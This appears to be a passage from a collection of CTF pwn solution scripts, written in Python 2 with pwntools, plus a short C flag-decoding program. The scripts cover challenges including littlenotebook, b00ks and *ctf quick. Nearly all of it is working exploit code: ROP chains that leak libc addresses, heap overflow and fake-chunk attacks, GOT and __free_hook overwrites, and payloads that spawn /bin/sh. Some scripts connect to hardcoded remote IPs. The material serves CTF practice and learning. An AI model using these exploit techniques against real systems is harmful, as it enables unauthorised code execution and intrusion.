# Round 1: the name overflow calls puts(puts@got) and returns to 0x8048470.
p.recvuntil("Yo, what's your name:\n")
pay = 'b'*12 + p32(elf.plt['puts']) + p32(0x8048470) + p32(elf.got['puts']) + 'aaa'
p.sendline(pay)
#Methamphetamine
p.recvuntil('aaa\n')
p.sendline('Methamphetamine' + '\xff\xff') # integer overflow in the length check
p.recvuntil('packing drugs...\n')
puts_addr = u32(p.recv(4))
# 0x2a540 is the puts->system distance of one specific libc build.
system_addr = puts_addr - 0x2a540
success("puts_addr: " + hex(puts_addr))
success("system_addr: " + hex(system_addr))

# Round 2: read(0, bss+100, 8) then system() with that buffer as argument;
# the "/bin/sh\x00" line below is what read() receives.
p.recvuntil("Yo, what's your name:\n")
p.sendline('c'*12 + p32(elf.plt['read']) + p32(system_addr) + p32(0) + p32(elf.bss()+100) + p32(8) + 'sir') 
p.recv()
p.sendline('Methamphetamine' + '\xff\xff')
p.sendline('/bin/sh\x00')
p.interactive()

i春秋_3.7Z

from pwn import *
def login(data):
    """XOR every character of ``data`` with its 0-based position and return the
    result as a string of the same length."""
    return ''.join(chr(index ^ ord(ch)) for index, ch in enumerate(data))
#p = process('./http')
p = remote( '106.75.2.53',80)
# The User-Agent value is the position-XORed form of 'useragent' (see login()).
payload = 'User-Agent: '+login('useragent')
print payload
# Note: no line break between the two headers; sent exactly as the author did.
payload += 'token: '+'/bin/sh'
payload += '\r\n\r\n'
p.send(payload)
p.interactive()
# Second interactive() is reached only after the first one returns; harmless.
p.interactive()

x计划_littlenotebook

from pwn import *
import sys
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './littlennotebook'
p = process(name)
elf= ELF(name)
if args.G:
    gdb.attach(p)

def add(num,data):
    """Menu option 1: create a note of length ``num`` holding ``data``
    (both are sent through str()) via the module tube ``p``."""
    replies = (('your choice?\n', "1"),
               ('enter the lenth of notebook:\n', str(num)),
               ('input the content:', str(data)))
    for prompt, reply in replies:
        p.recvuntil(prompt)
        p.sendline(reply)
    
def edit(i,num,data):
    """Menu option 2: edit note ``i`` with new length ``num`` and content
    ``data``.  The content is sent without waiting for a prompt, as in the
    original."""
    replies = (('your choice?\n', "2"),
               ('enter the index of notebook:\n', str(i)),
               ('enter the lenth of notebook:\n', str(num)))
    for prompt, reply in replies:
        p.recvuntil(prompt)
        p.sendline(reply)
    p.sendline(str(data))
 
def delete(i):
    """Menu option 3: delete note ``i`` (module tube ``p``)."""
    steps = (('your choice?\n', "3"), ('enter the index:\n', str(i)))
    for prompt, reply in steps:
        p.recvuntil(prompt)
        p.sendline(reply)
    
def show(i):
    """Menu option 4: print note ``i``; the output is left in the tube."""
    steps = (('your choice?\n', "4"), ('enter the index:\n', str(i)))
    for prompt, reply in steps:
        p.recvuntil(prompt)
        p.sendline(reply)
    
#0x4009A7
#0x60209C 
# Python 2 script; 0x60209C / 0x602018 are fixed addresses of this non-PIE binary.
add(20,'a'*8)
add(20,'b'*8)
add(20,'c'*8)

delete(2)
delete(1)

# Note 0 is edited with more data (40) than its length (20).
pay1 = 'a'*24 + p64(0x21) + p64(0x60209C)
edit(0,40,pay1)
add(20,'/bin/sh\x00')

pay2 = p64(0x0000001400000002) + p64(0x60201800000000)
add(20,pay2)

# show(0) now prints 6 bytes of a libc pointer; 0x82ba0 / 0x42510 are
# offsets of one specific libc build.
show(0)
p.recvuntil('0:')
free_addr = u64(p.recv(6) + '\x00\x00')
lib_add = free_addr - 0x82ba0
system_addr = lib_add + 0x42510
success("free_addr: " + hex(free_addr))
success("lib_add: " + hex(lib_add))
success("system_addr: " + hex(system_addr))

edit(1,20,'/bin/sh\x00')
edit(0,8,p64(system_addr))
delete(1)
p.interactive()

Asis CTF 2016 b00ks

from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './b00ks'
p = process(name)
#p=remote('chall.pwnable.tw', 10103)
elf= ELF(name)
# Host libc; the hard-coded offsets further down are tied to this build.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
if args.G:
    gdb.attach(p)
    
def creat(nsize,ndata,dsize,data):
    """Menu option 1: create a book with name ``ndata`` (buffer ``nsize``) and
    description ``data`` (buffer ``dsize``); every value goes through str()."""
    replies = (('> ', '1'),
               ('Enter book name size: ', str(nsize)),
               ('Enter book name (Max 32 chars): ', str(ndata)),
               ('Enter book description size: ', str(dsize)),
               ('Enter book description: ', str(data)))
    for prompt, reply in replies:
        p.recvuntil(prompt)
        p.sendline(reply)

def delete(i):
    """Menu option 2: delete book ``i`` (module tube ``p``)."""
    steps = (('> ', '2'), ('Enter the book id you want to delete: ', str(i)))
    for prompt, reply in steps:
        p.recvuntil(prompt)
        p.sendline(reply)

def edit(i,data):
    """Menu option 3: replace the description of book ``i`` with ``data``
    (sent as given, not through str())."""
    replies = (('> ', '3'),
               ('Enter the book id you want to edit: ', str(i)),
               ('Enter new book description: ', data))
    for prompt, reply in replies:
        p.recvuntil(prompt)
        p.sendline(reply)
    
def show():
    """Menu option 4: list the books; output stays in the tube for the caller."""
    prompt, choice = '> ', '4'
    p.recvuntil(prompt)
    p.sendline(choice)

def change(data):
    """Menu option 5: set the author name to ``data`` (sent as given)."""
    steps = (('> ', '5'), ('Enter author name: ', data))
    for prompt, reply in steps:
        p.recvuntil(prompt)
        p.sendline(reply)
# Leak the heap address: a 32-byte author name leaves no terminator, so the
# listing prints the bytes that follow the 'qqqq' marker.  Python 2 script.
p.recvuntil('Enter author name: ')
p.sendline('a'*28 + 'q'*4)
creat(128,'b',32,'c')
creat(0x21000,'/bin/sh\x00',0x21000,'/bin/sh\x00')
show()
p.recvuntil('qqqq')
heap_addr = u64(p.recv(6) + '\x00\x00')
# Leak the libc address through the overwritten book-1 record.
pay1 = p64(1) + p64(heap_addr + 0x38) + p64(heap_addr - 0x30) + p64(0x32)
edit(1,pay1)
change('a'*28 + 's'*4)
show()
p.recvuntil('Name: ')
# 0x59c010 / 0x3b68e8 / 0x42510 are offsets of the author's host libc.
libc_addr = u64(p.recv(6) + '\x00\x00') - 0x59c010
free_hook = libc_addr + 0x3b68e8
#one_gadget = libc_addr + 0x4239e # 0x423f2 #0xe317e 
system_addr = libc_addr + 0x42510
success("heap_aadr: " + hex(heap_addr))
success("libc_addr: " + hex(libc_addr))
success("free_hook: " + hex(free_hook))
success("system_addr: " + hex(system_addr))
# Write system_addr over __free_hook (a one_gadget address would also work).
pay2 = p64(1) + p64(heap_addr + 0x38) + p64(free_hook) + p64(0x32)
edit(1,pay2)
pay3 = p64(system_addr) + p64(system_addr)
edit(1,pay3)
# Freeing book 2 (its name is '/bin/sh') triggers the hook.
delete(2)
p.interactive()

WhaleCTF_逆向练习

#include<stdio.h>
#include<string.h>
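/* Rebuilds a 17-character flag by picking bytes of `str` at the positions
 * listed in `num`, then prints it.  The original never wrote a terminator
 * into flag[] (17 bytes filled, 18 allocated), so printf("%s") could read
 * the uninitialised 18th byte and beyond; it is now NUL-terminated. */
int main()
{
	const char str[] = "sKfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138";
	const int num[] = {0x1,0x4,0xe,0xa,0x5,0x24,0x17,0x2a,0xd,0x13,0x1c,0xd,
	                   0x1b,0x27,0x30,0x29,0x2a};
	const int count = (int)(sizeof(num) / sizeof(num[0]));   /* 17 == 0x11 */
	char flag[0x12];                                        /* count + NUL */
	int i;
	for(i=0;i<count;i++)
	{
		flag[i] = str[num[i]];
	}
	flag[count] = '\0';
	printf("flag: %s",flag);
// e2s6ry3r5s8f61024
	return 0;
} 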

*ctf_quick

from pwn import *
import struct
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './quick'
#p = process(name)
p=remote('34.92.96.238',10000)
elf= ELF(name)
# The challenge libc; symbol lookups below come from it.
libc = ELF('./libc.so.6')
if args.G:
    gdb.attach(p)

# Python 2 script, 32-bit non-PIE target (0x804a024, 0x8048816 etc. are fixed).
# Each "number" is a 16-byte decimal text field followed by binary record
# fields; the first one is laid out so that the sort leaves puts(got) + a
# return to 0x8048816 on the stack.
p.recvuntil('how many numbers do you want to sort?\n')
p.sendline('2')
pay1 = str(elf.plt['printf']) + '\x00'*(16-len(str(elf.plt['printf']))) + p32(0x2) + p32(0x0) + p32(0x0) + p32(0x804a024) + 'a'*16 + p32(elf.plt['puts']) + p32(0x8048816) + p32(0x804a02c)
p.recvuntil('the 1th number:')
p.sendline(pay1)

pay2 = '134514016' + '\x00'*7 + p32(0x2) + p32(0x1) + p32(0x1) + p32(0x804a018-4) 
p.recvuntil('the 2th number:')
p.sendline(pay2)
# The result dump contains a libc pointer at bytes 64..68.
p.recvuntil('Here is the result:')
x = p.recv()
lib_main_addr = u32(x[64:68])
libc_addr = lib_main_addr -  libc.symbols['__libc_start_main'] #0x18d90
system_addr = libc_addr + libc.symbols['system'] #0x3cd10 #
binsh_addr = libc_addr + next(libc.search('/bin/sh')) #0x17b988 #
print(hex(libc.symbols['__libc_start_main']))
#p.recvuntil('how many numbers do you want to sort?\n')
p.sendline('1')
# system_addr is reinterpreted as a signed 32-bit int because the target only
# parses decimal text.
x = struct.unpack("i",p32(system_addr))
x = x[0]
print("x: " + str(x))
pay2 = str(x) + '\x00'*(16-len(str(x))) + p32(0x2) + p32(0x1) + p32(0x1) + p32(0x804a024) + 'a'*16 + p32(system_addr) + p32(0x8048816) + p32(binsh_addr)
p.recvuntil('the 1th number:')
p.sendline(pay2)
success("lib_main_addr: " + hex(lib_main_addr))
success("libc_addr: " + hex(libc_addr))
success("system_addr: " + hex(system_addr))
success("binsh_addr: " + hex(binsh_addr))

p.interactive()